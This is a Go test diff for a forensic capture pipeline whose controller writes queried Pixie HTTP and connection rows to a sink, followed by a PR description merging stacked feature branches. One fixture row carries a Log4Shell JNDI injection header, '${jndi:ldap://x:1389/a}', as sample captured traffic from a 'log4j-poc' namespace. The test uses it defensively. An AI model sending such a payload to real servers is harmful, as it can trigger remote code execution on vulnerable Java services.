+	return q.rows, q.err
+}
+
+func orderQueryCtl(snk Sink, q PixieQuerier) *Controller {
+	clk := &fakeClock{t: canonicalEventTime}
+	c := New(newFakeTrigger(), snk, defaultCfg(), clk)
+	if q != nil {
+		c = c.WithPixieQuerier(q)
+	}
+	return c
+}
+
+var oqTarget = anomaly.Target{Namespace: "log4j-poc", Pod: "backend-x", Comm: "java"}
+
+func oqWindow() (time.Time, time.Time) {
+	return canonicalEventTime.Add(-time.Minute), canonicalEventTime
+}
+
+// A control-ordered query for a table with pixie data writes those rows to the
+// sink under that table — this is how the jndi-in-http dx read at triage lands in
+// forensic_db even with no kubescape-anomaly window for the pod (dx#93).
+func TestOrderQueryWritesRows(t *testing.T) {
+	snk := newRecordingSink()
+	q := &stubQuerier{rows: []map[string]any{
+		{"req_headers": "User-Agent: ${jndi:ldap://x:1389/a}", "req_path": "/api/products"},
+	}}
+	lo, hi := oqWindow()
+	if err := orderQueryCtl(snk, q).OrderQuery(oqTarget, "http_events", lo, hi, "qid-1"); err != nil {
+		t.Fatalf("OrderQuery: %v", err)
+	}
+	if got := snk.count("http_events"); got != 1 {
+		t.Errorf("http_events rows written = %d, want 1", got)
+	}
+}
+
+// With the operator-side querier disabled, OrderQuery errors (so /query 502s) —
+// start/stop + dx_attack_graph remain usable.
+func TestOrderQueryNoQuerierErrors(t *testing.T) {
+	snk := newRecordingSink()
+	lo, hi := oqWindow()
+	if err := orderQueryCtl(snk, nil).OrderQuery(oqTarget, "http_events", lo, hi, "qid-2"); err == nil {
+		t.Error("OrderQuery with no querier should error")
+	}
+}
+
+// Zero rows → no write, no error (the empty read is still recorded by reconcile).
+func TestOrderQueryEmptyNoWrite(t *testing.T) {
+	snk := newRecordingSink()
+	lo, hi := oqWindow()
+	if err := orderQueryCtl(snk, &stubQuerier{rows: nil}).OrderQuery(oqTarget, "conn_stats", lo, hi, "qid-3"); err != nil {
+		t.Fatalf("OrderQuery empty: %v", err)
+	}
+	if got := snk.count("conn_stats"); got != 0 {
+		t.Errorf("empty result must not write, got %d rows", got)
+	}
+}
+
+// A sink write failure surfaces as an OrderQuery error (so /query 502s and dx can
+// retry) rather than being silently dropped.
+func TestOrderQuerySinkErrorSurfaces(t *testing.T) {
+	snk := newRecordingSink()
+	snk.werr = errors.New("ch unreachable")
+	q := &stubQuerier{rows: []map[string]any{{"x": 1}}}
+	lo, hi := oqWindow()
+	if err := orderQueryCtl(snk, q).OrderQuery(oqTarget, "http_events", lo, hi, "qid-4"); err == nil {
+		t.Error("OrderQuery should surface the sink write error")
+	}
+}


### PR DESCRIPTION
Combines the AE stack that was built on #68 (`ae-followup-auth`, now squash-merged to main) into **one PR rebased onto main** — the three were a linear stack of one commit each, cherry-picked cleanly onto current `main` (no conflicts):

- **#73** `feat(adaptive_export): wire the /query runner` — dx `OrderQuery` → forensic capture (dx#93). AE runs a dx-ordered query and captures the result to `forensic_db` (the mechanism by which dx orders capture of a workload's protocol tables, incl `pgsql_events`).
- **#77** `refactor(ae): rename dx_attack_graph → dx_evidence_graph` (+ `_malicious` → `_malignant` view).
- **#78** `feat(ae): /dx/evidence_manifest ingest → forensic_db.dx_evidence_manifest`.

Delta over main: 10 files, +442/−35. Verified: `OrderQuery` present, `dx_attack_graph` fully renamed to `dx_evidence_graph` in ddl.go, `evidence_manifest` wired.

**Supersedes #73, #77, #78** (their branches were on the pre-squash `ae-followup-auth` base and won't rebase cleanly onto main; this PR is their content on current main). **#81 (DNS ppid attribution) is intentionally NOT included** — being handled separately.

To be tested as one PR on a fresh rig (AE image built from this branch) alongside dx `release/dx/v0.3.0-nsprec1`.